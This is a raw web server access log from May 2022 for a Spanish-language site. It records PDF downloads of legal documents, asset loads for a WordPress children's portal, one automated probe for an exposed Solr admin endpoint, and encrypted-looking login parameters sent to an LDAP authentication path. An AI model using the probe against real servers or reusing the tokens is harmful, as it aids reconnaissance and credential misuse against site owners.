216.245.221.92 - - [17/May/2022:22:57:28 -0500] "HEAD / HTTP/1.1" 200 -
34.91.46.235 - - [17/May/2022:22:57:57 -0500] "GET / HTTP/1.1" 200 319
207.46.13.74 - - [17/May/2022:22:58:06 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/02778.pdf HTTP/1.1" 200 361604
172.22.2.4 - - [17/May/2022:22:58:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/May/2022:22:59:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
191.89.49.241 - - [17/May/2022:23:01:59 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
191.89.49.241 - - [17/May/2022:23:01:59 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
191.89.49.241 - - [17/May/2022:23:01:59 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
191.89.49.241 - - [17/May/2022:23:01:59 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
191.89.49.241 - - [17/May/2022:23:01:59 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
191.89.49.241 - - [17/May/2022:23:01:59 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
191.89.49.241 - - [17/May/2022:23:01:59 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
191.89.49.241 - - [17/May/2022:23:01:59 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/images/box_shadow.png HTTP/1.1" 200 108
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
191.89.49.241 - - [17/May/2022:23:02:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.ttf?93978679 HTTP/1.1" 200 102241
216.245.221.92 - - [17/May/2022:23:02:28 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.74 - - [17/May/2022:23:02:58 -0500] "GET /BLA/resoluciones/AUTOS%202018/2851.pdf HTTP/1.1" 304 -
172.22.2.4 - - [17/May/2022:23:04:23 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%20No.%2000018%20del%2002%20de%20diciembre%20del%202020.pdf HTTP/1.1" 304 -
193.106.191.48 - - [17/May/2022:23:04:33 -0500] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 1018
172.22.2.4 - - [17/May/2022:23:04:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.84.90.91 - - [17/May/2022:23:06:54 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+YfBcYhecItdWTU4cal8lZAwYVXd63O3dq3zS0pPp1oBpQJrzjK26TG7z6PwD/0ifzdWY96PUlnQ==&y=U2FsdGVkX1/b6uD0TrjMxyJuhKuR0UvvtdTH6z84MG4y+VgjlAK2uZX2pBG706fV HTTP/1.1" 200 30
186.84.90.91 - - [17/May/2022:23:06:54 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18PiwnLnKOOKL0f/McGM76uthAlY2isEEBLwWZ54s5OwEfMZnHEhDEbmYxnRZUkl6mjDcsXZAFtoIq1oFe0VZvgX+j4A6PlEXU=&u=U2FsdGVkX1/V890eYIOdbppYhUpxSKMHIv6bpy3ywJw=&y=U2FsdGVkX1/b6uD0TrjMxyJuhKuR0UvvtdTH6z84MG4y+VgjlAK2uZX2pBG706fV HTTP/1.1" 200 97
